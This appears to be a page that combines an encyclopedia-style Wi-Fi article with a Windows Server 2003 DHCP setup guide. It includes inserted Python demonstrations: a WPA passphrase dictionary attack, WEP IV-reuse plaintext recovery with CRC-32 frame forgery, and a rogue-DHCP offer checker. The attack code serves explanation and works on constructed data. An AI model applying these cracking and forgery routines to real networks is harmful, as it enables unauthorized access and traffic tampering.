WIFI
Wi-Fi (pronounced wye fye, IPA: /ˈwaɪfaɪ/), a wireless-technology brand owned by the Wi-Fi Alliance, promotes standards with the aim of improving the interoperability of wireless local area network products based on the IEEE 802.11 standards. Common applications for Wi-Fi include Internet and VoIP phone access, gaming, and network connectivity for consumer electronics such as televisions, DVD players, and digital cameras.
The Wi-Fi Alliance, a consortium of separate and independent companies, agrees on a set of common interoperable products based on the family of IEEE 802.11 standards.[1] The Wi-Fi Alliance certifies products via a set of defined test-procedures to establish interoperability. Those manufacturers with membership of Wi-Fi Alliance and whose products pass these interoperability tests can mark their products and product packaging with the Wi-Fi logo.[2]
Wi-Fi technologies have gone through several generations since their inception in 1998. The Microsoft Windows, Apple Mac OS X and open source Unix and Linux operating systems support Wi-Fi to different extents.
A Wi-Fi-enabled device such as a PC, game console, cell phone, MP3 player or PDA can connect to the Internet when within range of a wireless network connected to the Internet. The coverage of one or more interconnected access points — called a hotspot — can comprise an area as small as a single room with wireless-opaque walls or as large as many square miles covered by overlapping access points. Wi-Fi technology has served to set up mesh networks, for example, in London.[3] Both architectures can operate in community networks.
In addition to restricted use in homes and offices, Wi-Fi can make access publicly available at Wi-Fi hotspots provided either free of charge or to subscribers to various providers. Organizations and businesses such as airports, hotels and restaurants often provide free hotspots to attract or assist clients. Enthusiasts or authorities who wish to provide services or even to promote business in a given area sometimes provide free Wi-Fi access. Metropolitan-wide WiFi (Muni-Fi) already has more than 300 projects in process.[4]
Wi-Fi also allows connectivity in peer-to-peer (wireless ad-hoc network) mode, which enables devices to connect directly with each other. This connectivity mode can prove useful in consumer electronics and gaming applications.
When wireless networking technology first entered the market many problems ensued for consumers who could not rely on products from different vendors working together. The Wi-Fi Alliance began as a community to solve this issue — aiming to address the needs of the end-user and to allow the technology to mature. The Alliance created the branding Wi-Fi CERTIFIED to reassure consumers that products will interoperate with other products displaying the same branding.
Many consumer devices use Wi-Fi. Amongst others, personal computers can network to each other and connect to the Internet, mobile computers can connect to the Internet from any Wi-Fi hotspot, and digital cameras can transfer images wirelessly.
Routers which incorporate a DSL-modem or a cable-modem and a Wi-Fi access point, often set up in homes and other premises, provide Internet-access and internetworking to all devices connected (wirelessly or by cable) to them. One can also connect Wi-Fi devices in ad-hoc mode for client-to-client connections without a router.
As of 2007 Wi-Fi technology had spread widely within business and industrial sites. In business environments, just like other environments, increasing the number of Wi-Fi access-points provides redundancy, support for fast roaming and increased overall network-capacity by using more channels or by defining smaller cells. Wi-Fi enables wireless voice-applications (VoWLAN or WVoIP). Over the years, Wi-Fi implementations have moved toward “thin” access-points, with more of the network intelligence housed in a centralized network appliance, relegating individual access-points to the role of mere “dumb” radios. Outdoor applications may utilize true mesh topologies. As of 2007 Wi-Fi installations can provide a secure computer networking gateway, firewall, DHCP server, intrusion detection system, and other functions.
Wi-Fi allows LANs to be deployed without cabling for client devices, typically reducing the costs of network deployment and expansion. Spaces where cables cannot be run, such as outdoor areas and historical buildings, can host wireless LANs.
As of 2007 wireless network adapters are built into most modern laptops. The price of chipsets for Wi-Fi continues to drop, making it an economical networking option included in even more devices. Wi-Fi has become widespread in corporate infrastructures, which also helps with the deployment of RFID technology that can piggyback on Wi-Fi.[5]
Different competitive brands of access points and client network interfaces are interoperable at a basic level of service. Products designated “Wi-Fi Certified” by the Wi-Fi Alliance are backwards-interoperable. Wi-Fi is a global set of standards; unlike mobile telephones, any standard Wi-Fi device will work anywhere in the world, subject to the regional channel and power limits noted below.
Wi-Fi is widely available in more than 250,000 public hotspots and tens of millions of homes and corporate and university campuses worldwide. WPA with a pre-shared key resists attack only if a strong passphrase is used: because the key is derived deterministically from the passphrase and the SSID, a short or dictionary passphrase can be recovered offline from a captured four-way handshake. WPA2 (AES-CCMP) had no known practical weaknesses as of 2007. Quality-of-Service extensions (WMM) make Wi-Fi more suitable for latency-sensitive applications such as voice and video, and power-saving mechanisms (WMM Power Save) improve battery life.
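The passphrase point can be made concrete. The following Python block is an added example, not code from the page or from the Wi-Fi Alliance: it derives a WPA/WPA2 pre-shared key the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output) and runs a dictionary search against a derived key. The wordlist is constructed for the example; the passphrase "password" with SSID "IEEE" is the published 802.11i test vector. In a real attack the attacker does not hold the PSK itself but checks each candidate against the MIC of a captured four-way handshake; the search loop is the same.

```python
"""WPA/WPA2 pre-shared key derivation and the offline dictionary attack it invites.
Added example; constants below are constructed for illustration."""
import hashlib
from typing import Iterable, Optional


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits)."""
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        raise ValueError("WPA passphrases are 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def dictionary_attack(target_psk: bytes, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate. The derivation is deterministic in (passphrase, SSID), so a
    captured target can be tested entirely offline. Returns the passphrase or None."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue                      # cannot be a valid WPA passphrase, skip the PBKDF2 work
        if wpa_psk(candidate, ssid) == target_psk:
            return candidate
    return None


# Constructed wordlist; "password" / "IEEE" is the 802.11i Annex H test vector.
WORDLIST = ["letmein", "12345678", "qwertyuiop", "password", "correct horse battery staple"]

if __name__ == "__main__":
    target = wpa_psk("password", "IEEE")
    print("PSK:", target.hex())
    print("recovered passphrase:", dictionary_attack(target, "IEEE", WORDLIST))
```

Two things follow from the derivation: the SSID acts as a salt, so precomputed tables only help against common network names, and 4096 iterations of HMAC-SHA1 cost well under a millisecond per guess on ordinary hardware, so a passphrase from a dictionary falls in seconds while a long random one does not.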
Spectrum assignments and operational limitations are not consistent worldwide. Most of Europe allows two channels beyond those permitted in the U.S. in the 2.4 GHz band (1–13 versus 1–11), and Japan allows one more (1–14). Europe, as of 2007, was essentially homogeneous in this respect. A frequently misunderstood point is that an 802.11b/g transmission is about 22 MHz wide while channel numbers are spaced 5 MHz apart, so one signal overlaps roughly five channel numbers; this leaves only three non-overlapping channels in the U.S. (1, 6 and 11) and four in Europe (1, 5, 9 and 13). Equivalent isotropically radiated power (EIRP) in the EU is limited to 20 dBm (0.1 W).
Power consumption is fairly high compared to some other low-bandwidth standards, such as Zigbee and Bluetooth, making battery life a concern.
The first wireless encryption standard, Wired Equivalent Privacy (WEP), is easily broken even when correctly configured. Wi-Fi Protected Access (WPA, shipping since 2003) and WPA2 (certified from 2004 and based on IEEE 802.11i) were introduced to replace it and are now available on most products. Wi-Fi access points typically default to an “open” (encryption-free) mode. Novice users benefit from a zero-configuration device that works out of the box, but this default leaves the LAN open to anyone in radio range. Turning security on requires the user to configure the device, usually through a web or graphical interface. Traffic on an open (unencrypted) network can be captured by anyone nearby and read or copied, personal information included, unless another layer protects the data, such as a VPN or an HTTPS web session. (See HTTPS/Secure Socket Layer.)
Many 2.4 GHz 802.11b and 802.11g Access points default to the same channel on initial startup, contributing to congestion on certain channels. To change the channel of operation for an access point requires the user to configure the device.
Wi-Fi networks have limited range. A typical home router using 802.11b or 802.11g with a stock antenna might reach about 32 m (120 ft) indoors and 95 m (300 ft) outdoors. Range also varies with frequency band: the 2.4 GHz band reaches slightly farther than the 5 GHz band. Outdoor range with improved (directional) antennas can be several kilometres or more with line of sight.
Throughput also falls with distance: as the received signal weakens, the radios step down to progressively lower data rates, so a distant client gets a fraction of the nominal speed and consumes more airtime per byte, which slows the other clients on the same access point as well.
Wi-Fi pollution, an excessive number of access points in an area, especially on the same or neighbouring channels, can block access and degrade other access points: the 802.11b/g channels overlap, and each additional transmitter lowers the signal-to-noise ratio (SNR) at the others. This is a problem in high-density areas such as large apartment complexes or office buildings with many access points. Other devices also use the 2.4 GHz band: microwave ovens, security cameras, Bluetooth devices, (in some countries) amateur radio, video senders, cordless phones and baby monitors can all add significant interference. The usual advice for those suffering interference or crowding is to move to 5 GHz equipment (802.11a, or 802.11n if it supports 5 GHz), since that band is relatively unused and offers many more channels. This also requires configuring the client to prefer the 5 GHz network and giving each band a different network name (SSID).
Congestion is also an issue when municipalities,[6] or other large entities such as universities, seek to provide large-area coverage. At the same time, the unlicensed status of the 2.4 GHz band that makes such crowding possible is also what allowed Wi-Fi to spread so widely.
Interoperability issues between non-Wi-Fi brands or proprietary deviations from the standard can disrupt connections or lower throughput for every device within range, including the non-Wi-Fi or proprietary product itself.
Standard devices
Wireless access points connect a group of wireless devices to an adjacent wired LAN. An access point is similar to a network hub, relaying data between the connected wireless devices and a (usually) single wired device, most often an Ethernet hub or switch, so that wireless devices can communicate with wired ones.
Wireless adapters allow devices to connect to a wireless network. These adapters connect to devices using various external or internal interconnects such as PCI, miniPCI, USB, ExpressCard, Cardbus and PC card. Most newer laptop computers are equipped with internal adapters. Internal cards are generally more difficult to install.
Wireless routers integrate a wireless access point, an Ethernet switch and router firmware that provides IP routing, NAT and DNS forwarding through an integrated WAN interface. A wireless router allows wired and wireless Ethernet LAN devices to connect to a (usually) single WAN device such as a cable modem or DSL modem. All three functions (mainly the access point and the router) are configured through one central utility, usually an integrated web server that serves pages to wired and wireless LAN clients and, often optionally, to WAN clients; exposing that management interface on the WAN side is a common misconfiguration and should stay disabled unless it is needed. The utility may also be an application run on a desktop computer, as with Apple’s AirPort.
Wireless network bridges connect a wired network to a wireless network. This is different from an access point in the sense that an access point connects wireless devices to a wired network at the data-link layer. Two wireless bridges may be used to connect two wired networks over a wireless link, useful in situations where a wired connection may be unavailable, such as between two separate homes.
Wireless range extenders or wireless repeaters can extend the range of an existing wireless network. Range extenders can be placed strategically to lengthen the coverage area or to carry the signal around barriers such as L-shaped corridors. Each hop through a repeater adds latency, and a single-radio repeater must receive and retransmit every frame on the same channel, roughly halving the available throughput per hop. A device connected through a chain of repeaters is limited to the throughput of the weakest link between the point where its connection originates and the point where it ends.
Aerials and connectors
Most commercial devices (routers, access points, bridges, repeaters) designed for home or business environments use either RP-SMA or RP-TNC antenna connectors. PCI wireless adapters also mainly use RP-SMA connectors. Most PC card and USB wireless only have internal antennas etched on their printed circuit board while some have MMCX connector or MC-Card external connections in addition to an internal antenna. A few USB cards have a RP-SMA connector. Most Mini PCI wireless cards utilize Hirose U.FL connectors, but cards found in various wireless appliances contain all of the connectors listed. Many high-gain (and homebuilt antennas) utilize the Type N connector more commonly used by other radio communications methods.
Non-standard devices
Distance records include:
June 2007: 382 km (237 mi), held by Ermanno Pietrosemoli and EsLaRed of Venezuela, transferring about 3 MB of data between the mountain tops of El Águila and Platillón.
Swedish space agency: 310 km (193 mi), but using 6-watt amplifiers to reach an overhead stratospheric balloon.
Embedded systems
Wi-Fi availability in the home is increasing, and this extension of the Internet into the home will increasingly be used for remote monitoring, for example of security systems and in tele-medicine. Building such devices around a system that runs one of the general-purpose operating systems mentioned above is usually unfeasible because of weight, power consumption and cost.
Increasingly in the last few years (particularly as of early 2007), embedded Wi-Fi modules have become available which come with a real-time operating system and provide a simple means of wireless enabling any device which has and communicates via a serial port.
This allows simple monitoring devices – for example, a portable ECG monitor hooked up to a patient in their home – to be created. This Wi-Fi enabled device effectively becomes part of the internet cloud and can communicate with any other node on the internet. The data collected can hop via the home’s Wi-Fi access point to anywhere on the internet.
These Wi-Fi modules are designed so that designers need minimal Wi-Fi knowledge to wireless-enable their products.
Unintended and intended use by outsiders
During the early popular adoption of 802.11, providing open access points for anyone within range to use was encouraged to cultivate wireless community networks;[7] particularly since people on average use only a fraction of their upstream bandwidth at any given time. Later, equipment manufacturers and mass-media advocated isolating users to a predetermined whitelist of authorized users—referred to as “securing” the access point.
Measures to deter unauthorized users include suppressing the access point’s SSID broadcast, allowing only clients with known MAC addresses to join the network, and the various encryption standards. Suppressing the SSID and filtering MAC addresses are ineffective as security measures: the SSID is sent in the clear in probe responses and association requests, and 802.11 frame headers, including source and destination MAC addresses, are never encrypted, so an eavesdropper can read an authorized address off the air and, since most drivers let the user change the interface’s MAC address, join the network by spoofing it.
WEP encryption protects against casual snooping but gives a misleading sense of security, since freely available tools such as AirSnort or aircrack recover WEP keys quickly. After observing 5–10 million encrypted packets, AirSnort determines the key in under a second[8]; newer tools such as aircrack-ptw use Klein’s attack to recover a key with 50% success from only about 40,000 packets, and an active attacker can generate that much traffic in minutes by replaying captured ARP requests. The newer Wi-Fi Protected Access (WPA) and IEEE 802.11i (WPA2) standards have none of WEP’s serious weaknesses, provided that a pre-shared key, if one is used, is strong.
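The figures above describe key-recovery attacks that need statistics over many packets. Two of WEP’s design flaws need no statistics at all, and the following Python block demonstrates both on frames it builds itself; it is an added example and not code from AirSnort, aircrack or the original page. It implements WEP’s actual construction (RC4 keyed with the 24-bit IV prepended to the secret key, a CRC-32 integrity check value, the IV sent in the clear), then shows that two frames encrypted under the same IV leak the XOR of their plaintexts, and that the CRC-32 check value can be fixed up after flipping arbitrary bits of an encrypted frame, so a receiver accepts a modified frame without the attacker knowing the key. The 40-bit key, the IV and the two request lines are constructed for the example.

```python
"""Two classic WEP weaknesses shown on constructed frames (added example)."""
import struct
import zlib
from typing import Optional


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream: key-scheduling followed by `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: an unkeyed CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, in the clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Return the plaintext when the ICV verifies, None when the receiver would drop the frame."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4(iv + key, len(body)))
    plaintext, tag = clear[:-4], clear[-4:]
    return plaintext if icv(plaintext) == tag else None


def recover_via_iv_reuse(known_frame: bytes, known_plaintext: bytes, target_frame: bytes) -> bytes:
    """Keystream reuse: same IV and key give the same keystream, so C1 XOR C2 = P1 XOR P2.
    With P1 known the keystream falls out and P2 with it; the key is never needed."""
    if known_frame[:3] != target_frame[:3]:
        raise ValueError("frames must share an IV")
    n = len(target_frame) - 3 - 4               # target plaintext length (strip IV and ICV)
    keystream = xor(known_frame[3:3 + n], known_plaintext[:n])
    return xor(target_frame[3:3 + n], keystream)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Alter an encrypted frame without the key. CRC-32 is affine, so for equal-length inputs
    crc(p ^ d) = crc(p) ^ crc(d) ^ crc(0...0); XOR that correction into the encrypted ICV
    and the receiver's check still passes on the modified plaintext."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole plaintext")
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    return iv + xor(body, delta + struct.pack("<I", icv_delta))


# Constructed material: a 40-bit key, one IV reused for two frames (a 24-bit IV space
# guarantees reuse on a busy network), and two same-length HTTP request lines.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"
P1 = b"GET /index.html HTTP/1.0"
P2 = b"POST /login.php HTTP/1.0"
FRAME1 = wep_encrypt(KEY, IV, P1)
FRAME2 = wep_encrypt(KEY, IV, P2)


def demo():
    """Run both attacks. Returns (plaintext recovered from FRAME2 without the key,
    what the access point decrypts from the tampered FRAME1)."""
    recovered = recover_via_iv_reuse(FRAME1, P1, FRAME2)
    wanted = b"GET /admin.html HTTP/1.0"
    tampered = flip_bits(FRAME1, xor(P1, wanted))
    return recovered, wep_decrypt(KEY, tampered)


if __name__ == "__main__":
    rec, tam = demo()
    print("recovered from reused IV:", rec)
    print("tampered frame accepted as:", tam)
```

A 24-bit IV space holds about 16.7 million values, so a busy access point repeats IVs within hours, and early drivers reset the IV to zero on start-up; the ICV fix-up works because CRC-32 is linear rather than a keyed MAC, which is why WPA replaced it with a keyed integrity check.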
Recreational logging and mapping of other people’s access points has become known as wardriving. It is also common for people to use open (unencrypted) Wi-Fi networks as a free service, termed piggybacking. Indeed, many access points are intentionally installed without security turned on so that they can be used as a free service. These activities do not result in sanctions in most jurisdictions; however, legislation and case law differ considerably across the world. A proposal to leave graffiti describing available services was called warchalking. A widely held (though not legally universal) rule of thumb is that an access point without security enabled is a service that welcomes free use, while one with security enabled does not. The burden is then on the access point owner to configure and control access to his Internet connection; in a Florida court case, owner laziness was determined not to be a valid excuse.
Piggybacking is often unintentional. Most access points are configured without encryption by default, and operating systems such as Windows XP SP2 and Mac OS X may be configured to automatically connect to any available wireless network. A user who happens to start up a laptop in the vicinity of an access point may find the computer has joined the network without any visible indication. Moreover, a user intending to join one network may instead end up on another one if the latter’s signal is stronger. In combination with automatic discovery of other network resources (see DHCP and Zeroconf) this could possibly lead wireless users to send sensitive data to the wrong middle man when seeking a destination (see Man-in-the-middle attack). For example, a user could inadvertently use an insecure network to login to a website, thereby making the login credentials available to anyone listening, if the website is using an insecure protocol like HTTP, rather than a secure protocol like HTTPS.
Wi-Fi and amateur radio
In the U.S., Canada, Australia and Europe, a portion of the 2.4 GHz Wi-Fi radio spectrum is also allocated to amateur radio users. In the U.S., FCC Part 15 rules govern non-licensed operators (i.e. most Wi-Fi equipment users). Under Part 15 rules, non-licensed users must “accept” (i.e. endure) interference from licensed users and not cause harmful interference to licensed users. Amateur radio operators are licensed users, and retain what the FCC terms “primary status” on the band, under a distinct set of rules (Part 97). Under Part 97, licensed amateur operators may construct their own equipment, use very high-gain antennas, and boost output power to 100 watts on frequencies covered by Wi-Fi channels 2-6. However, Part 97 rules mandate using only the minimum power necessary for communications, forbid obscuring the data, and require station identification every 10 minutes. Therefore, output power control is required to meet regulations, and the transmission of any encrypted data (for example https) is questionable.
In practice, microwave power amplifiers are expensive. On the other hand, the short wavelength at 2.4 GHz allows for simple construction of very high gain directional antennas. Although Part 15 rules forbid any modification of commercially constructed systems, amateur radio operators may modify commercial systems for optimized construction of long links, for example. Using only 200 mW link radios and high gain directional antennas, a very narrow beam may be used to construct reliable links with minimal radio frequency interference to other users.
Question of health risks
The UK’s Health Protection Agency considers there is no consistent evidence of harm from the low power transmissions of Wi-Fi equipment. Consensus amongst scientists is that there is no evidence of harm, and the continuing calls for more research into the effects on human health remain limited. However, in September 2007, Germany’s Environment Ministry announced that its citizens should minimise their exposure to radiation from Wi-Fi by choosing conventional wired connections,[9] without any evidence and contrary to current internationally accepted safety criteria. Dr Michael Clark, of the Health Protection Agency, says published research on mobile phones and masts does not add up to an indictment of Wi-Fi:
All the expert reviews done here and abroad indicate that there is unlikely to be a health risk from wireless networks. … When we have conducted measurements in schools, typical exposures from Wi-Fi are around 20 millionths of the international guideline levels of exposure to radiation. As a comparison, a child on a mobile phone receives up to 50 percent of guideline levels. So a year sitting in a classroom near a wireless network is roughly equivalent to 20 minutes on a mobile. If Wi-Fi should be taken out of schools, then the mobile phone network should be shut down, too—and FM radio and TV, as the strength of their signals is similar to that from Wi-Fi in classrooms.[10]
History
Wi-Fi uses both single-carrier direct-sequence spread spectrum radio technology (part of the larger family of spread spectrum systems) and multi-carrier OFDM (Orthogonal Frequency Division Multiplexing) radio technology.
Unlicensed spread spectrum was first made available in the US by the Federal Communications Commission in 1985, and these FCC regulations were later copied with some changes in many other countries, enabling use of the technology in all major countries.[11] The FCC action was proposed by Michael Marcus of the FCC staff in 1980, and the subsequent regulatory action took five more years. It was part of a broader proposal to allow civil use of spread spectrum technology and was opposed at the time by mainstream equipment manufacturers and many radio system operators. These regulations then enabled the development of Wi-Fi, its onetime competitor HomeRF, and Bluetooth.
The precursor to Wi-Fi was invented in 1991 by NCR Corporation/AT&T (later Lucent & Agere Systems) in Nieuwegein, the Netherlands. It was initially intended for cashier systems; the first wireless products were brought on the market under the name WaveLAN with speeds of 1 Mbit/s to 2 Mbit/s. Vic Hayes, who held the chair of IEEE 802.11 for 10 years and has been named the ‘father of Wi-Fi,’ was involved in designing standards such as IEEE 802.11b, and 802.11a.
City wide Wi-Fi
- St. Cloud, Florida became the first city in the United States to offer city wide free Wi-Fi,[12] although many others have plans to offer the service. Corpus Christi, Texas had offered free Wi-Fi until May 31, 2007 when the network was purchased by Earthlink.[13] Philadelphia is also using Earthlink for its city wide Wi-Fi.[14] New Orleans had free city wide Wi-Fi shortly after Hurricane Katrina.[15] City wide Wi-Fi is available in nine cities in the UK, including Leeds, Manchester and London.[16] Other cities, such as the Minneapolis metro area, have a large number of Wi-Fi hotspots so you can receive good signals anywhere, even if from different sources. In Europe, the City of Luxembourg has a city-wide Wi-Fi network.
Origin and meaning of the term “Wi-Fi”
Despite the similarity between the terms “Wi-Fi” and “Hi-Fi“, statements reportedly made by Phil Belanger of the Wi-Fi Alliance contradict the conclusion that “Wi-Fi” stands for “Wireless Fidelity”.[17][18][19] According to Belanger, the Interbrand Corporation developed the brand “Wi-Fi” for the Wi-Fi Alliance to use to describe WLAN products that are based on the IEEE 802.11 standards. In Belanger’s words,
Wi-Fi and the yin yang style logo were invented by Interbrand. We [the founding members of the Wireless Ethernet Compatibility Alliance, now called as the Wi-Fi Alliance] hired Interbrand to come up with the name and logo that we could use for our interoperability seal and marketing efforts. We needed something that was a little catchier than ‘IEEE 802.11b Direct Sequence’.[20]
The Wi-Fi Alliance themselves invoked the term “Wireless Fidelity” with the marketing of a tag line “The Standard for Wireless Fidelity,” but later removed the tag from their marketing. The Wi-Fi Alliance now seems to discourage the propagation of the notion that “Wi-Fi” stands for “Wireless Fidelity”, but it has been referred to as such by the Wi-Fi Alliance in White Papers currently held in their knowledge base: “… a promising market for wireless fidelity (Wi-Fi) network equipment.”[21] and “A Short History of WLANs.” The association created the Wi-Fi logo to indicate that a product had been certified for interoperability.[22]
How To Install and Configure a DHCP Server in a Workgroup in Windows Server 2003
SUMMARY
How to Install the DHCP Service
Before you can configure the DHCP service, you must install it on the server. DHCP is not installed by default during a typical installation of Windows Standard Server 2003 or Windows Enterprise Server 2003. You can install DHCP either during the initial installation of Windows Server 2003 or after the initial installation is completed.
How to Install the DHCP Service on an Existing Server
1. Click Start, point to Control Panel, and then click Add or Remove Programs.
2. In the Add or Remove Programs dialog box, click Add/Remove Windows Components.
3. In the Windows Components Wizard, click Networking Services in the Components list, and then click Details.
4. In the Networking Services dialog box, click to select the Dynamic Host Configuration Protocol (DHCP) check box, and then click OK.
5. In the Windows Components Wizard, click Next to start Setup. Insert the Windows Server 2003 CD-ROM into the computer’s CD-ROM or DVD-ROM drive if you are prompted to do so. Setup copies the DHCP server and tool files to your computer.
6. When Setup is completed, click Finish.
How to Configure the DHCP Service
After you have installed and started the DHCP service, you must create a scope, which is a range of valid IP addresses that are available for lease to the DHCP client computers on the network. Microsoft recommends that each DHCP server in your environment have at least one scope that does not overlap with any other DHCP server scope in your environment. In Windows Server 2003, DHCP servers in an Active Directory-based domain must be authorized to prevent rogue DHCP servers from coming online; a Windows Server 2003 DHCP server that determines that it is unauthorized will not serve clients. Note that this check only restrains Windows DHCP servers that perform it; a rogue server running other software or hardware is not stopped by it, so unexpected DHCP offers still have to be watched for on the network.
How to Create a New Scope
1. Click Start, point to Programs, point to Administrative Tools, and then click DHCP.
2. In the console tree, right-click the DHCP server on which you want to create the new DHCP scope, and then click New Scope.
3. In the New Scope Wizard, click Next, and then type a name and description for the scope. This can be any name that you want, but it should be descriptive enough so that you can identify the purpose of the scope on your network (for example, you can use a name such as “Administration Building Client Addresses”). Click Next.
4. Type the range of addresses that can be leased as part of this scope (for example, use a range of IP addresses from a starting IP address of 192.168.100.1 to an ending address of 192.168.100.100). Because these addresses are given to clients, they must all be valid addresses for your network and not currently in use. If you want to use a different subnet mask, type the new subnet mask. Click Next.
5. Type any IP addresses that you want to exclude from the range that you entered. This includes any addresses in the range described in step 4 that may have already been statically assigned to various computers in your organization. Typically, domain controllers, Web servers, DHCP servers, Domain Name System (DNS) servers, and other servers have statically assigned IP addresses. Click Next.
6. Type the number of days, hours, and minutes before an IP address lease from this scope expires. This determines how long a client can hold a leased address without renewing it. Click Next, and then click Yes, I want to configure these options now to extend the wizard to include settings for the most common DHCP options. Click Next.
7. Type the IP address for the default gateway that should be used by clients that obtain an IP address from this scope. Click Add to add the default gateway address to the list, and then click Next.
8. If you are using DNS servers on your network, type your organization’s domain name in the Parent domain box. Type the name of your DNS server, and then click Resolve to make sure that your DHCP server can contact the DNS server and determine its address. Click Add to include that server in the list of DNS servers that are assigned to the DHCP clients. Click Next, and then follow the same steps if you are using a Windows Internet Naming Service (WINS) server, by adding its name and IP address. Click Next.
9. Click Yes, I want to activate this scope now to activate the scope and allow clients to obtain leases from it, and then click Next.
10. Click Finish.
11. In the console tree, click the server name, and then click Authorize on the Action menu.
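The scope created in the steps above (addresses 192.168.100.1 to 192.168.100.100, statically assigned low addresses excluded, a default gateway and a lease time) and the authorization point in the preceding section can both be checked on the wire. The following Python block is an added example and not part of the Microsoft article: it builds and parses RFC 2131 DHCP messages with no network I/O and validates a DHCPOFFER against a scope definition, flagging offers from a server that is not on an allow-list (the rogue-server case that authorization is meant to prevent) or that hand out an address or gateway outside what the scope permits. The scope values, the authorized server at 192.168.100.5, the client MAC address and both offers are constructed for the example; option codes 1, 3, 51, 53 and 54 are the standard DHCP options for subnet mask, router, lease time, message type and server identifier.

```python
"""DHCP OFFER validation against a configured scope (added example, no network I/O)."""
import ipaddress
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTREQUEST, BOOTREPLY = 1, 2
DHCPDISCOVER, DHCPOFFER = 1, 2
HEADER_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # RFC 2131 fixed fields, 236 bytes

# Constructed scope mirroring the wizard values: lease .1-.100, .1-.6 reserved for
# static hosts (gateway, servers), and a hypothetical authorized DHCP server at .5.
SCOPE = {
    "network": ipaddress.ip_network("192.168.100.0/24"),
    "range": (ipaddress.ip_address("192.168.100.1"), ipaddress.ip_address("192.168.100.100")),
    "exclusions": set(ipaddress.ip_network("192.168.100.0/29").hosts()),
    "router": ipaddress.ip_address("192.168.100.1"),
    "authorized_servers": {ipaddress.ip_address("192.168.100.5")},
}


def build_dhcp(op, xid, chaddr, yiaddr="0.0.0.0", options=()):
    """Serialise a DHCP message: fixed header, magic cookie, TLV options, end marker."""
    header = struct.pack(
        HEADER_FMT, op, 1, 6, 0, xid, 0, 0x8000,
        bytes(4), ipaddress.IPv4Address(yiaddr).packed, bytes(4), bytes(4),
        chaddr.ljust(16, b"\0"), bytes(64), bytes(128),
    )
    tlv = b"".join(struct.pack("!BB", code, len(value)) + value for code, value in options)
    return header + MAGIC_COOKIE + tlv + b"\xff"


def parse_dhcp(packet):
    """Decode the fixed fields and the options as a dict {code: raw value}."""
    fields = struct.unpack(HEADER_FMT, packet[:236])
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message: magic cookie missing")
    options, i = {}, 240
    while i < len(packet) and packet[i] != 255:      # 255 = end of options
        if packet[i] == 0:                            # 0 = pad byte, no length
            i += 1
            continue
        length = packet[i + 1]
        options[packet[i]] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return {
        "op": fields[0],
        "xid": fields[4],
        "yiaddr": ipaddress.IPv4Address(fields[8]),
        "chaddr": fields[11][:fields[2]],             # hlen bytes of the hardware address
        "options": options,
    }


def build_offer(xid, chaddr, yiaddr, server, router, lease_seconds):
    """Construct a DHCPOFFER as `server` would send it to the client `chaddr`."""
    def packed(addr):
        return ipaddress.IPv4Address(addr).packed
    return build_dhcp(BOOTREPLY, xid, chaddr, yiaddr, options=[
        (53, bytes([DHCPOFFER])),                     # message type
        (54, packed(server)),                         # server identifier
        (1, SCOPE["network"].netmask.packed),         # subnet mask
        (3, packed(router)),                          # router / default gateway
        (51, struct.pack("!I", lease_seconds)),       # lease time
    ])


def validate_offer(packet, scope=SCOPE):
    """Return a list of problem codes; an empty list means the offer matches the scope."""
    msg = parse_dhcp(packet)
    opts = msg["options"]
    if msg["op"] != BOOTREPLY or opts.get(53) != bytes([DHCPOFFER]):
        return ["not-an-offer"]
    problems = []
    server = ipaddress.IPv4Address(opts.get(54, bytes(4)))
    if server not in scope["authorized_servers"]:
        problems.append("unauthorized-server")        # the rogue-server signature
    lo, hi = scope["range"]
    if not lo <= msg["yiaddr"] <= hi:
        problems.append("address-outside-range")
    elif msg["yiaddr"] in scope["exclusions"]:
        problems.append("address-excluded")
    if opts.get(1) != scope["network"].netmask.packed:
        problems.append("mask-mismatch")
    if 3 in opts and ipaddress.IPv4Address(opts[3]) != scope["router"]:
        problems.append("router-mismatch")            # classic rogue-gateway redirection
    if 51 not in opts:
        problems.append("no-lease-time")
    return problems


# Constructed traffic: one legitimate offer and one from a rogue server at .200.
XID = 0x3903F326
CLIENT_MAC = bytes.fromhex("0015c5aabbcc")
GOOD_OFFER = build_offer(XID, CLIENT_MAC, "192.168.100.50", "192.168.100.5", "192.168.100.1", 8 * 3600)
ROGUE_OFFER = build_offer(XID, CLIENT_MAC, "192.168.100.200", "192.168.100.200", "192.168.100.200", 600)

if __name__ == "__main__":
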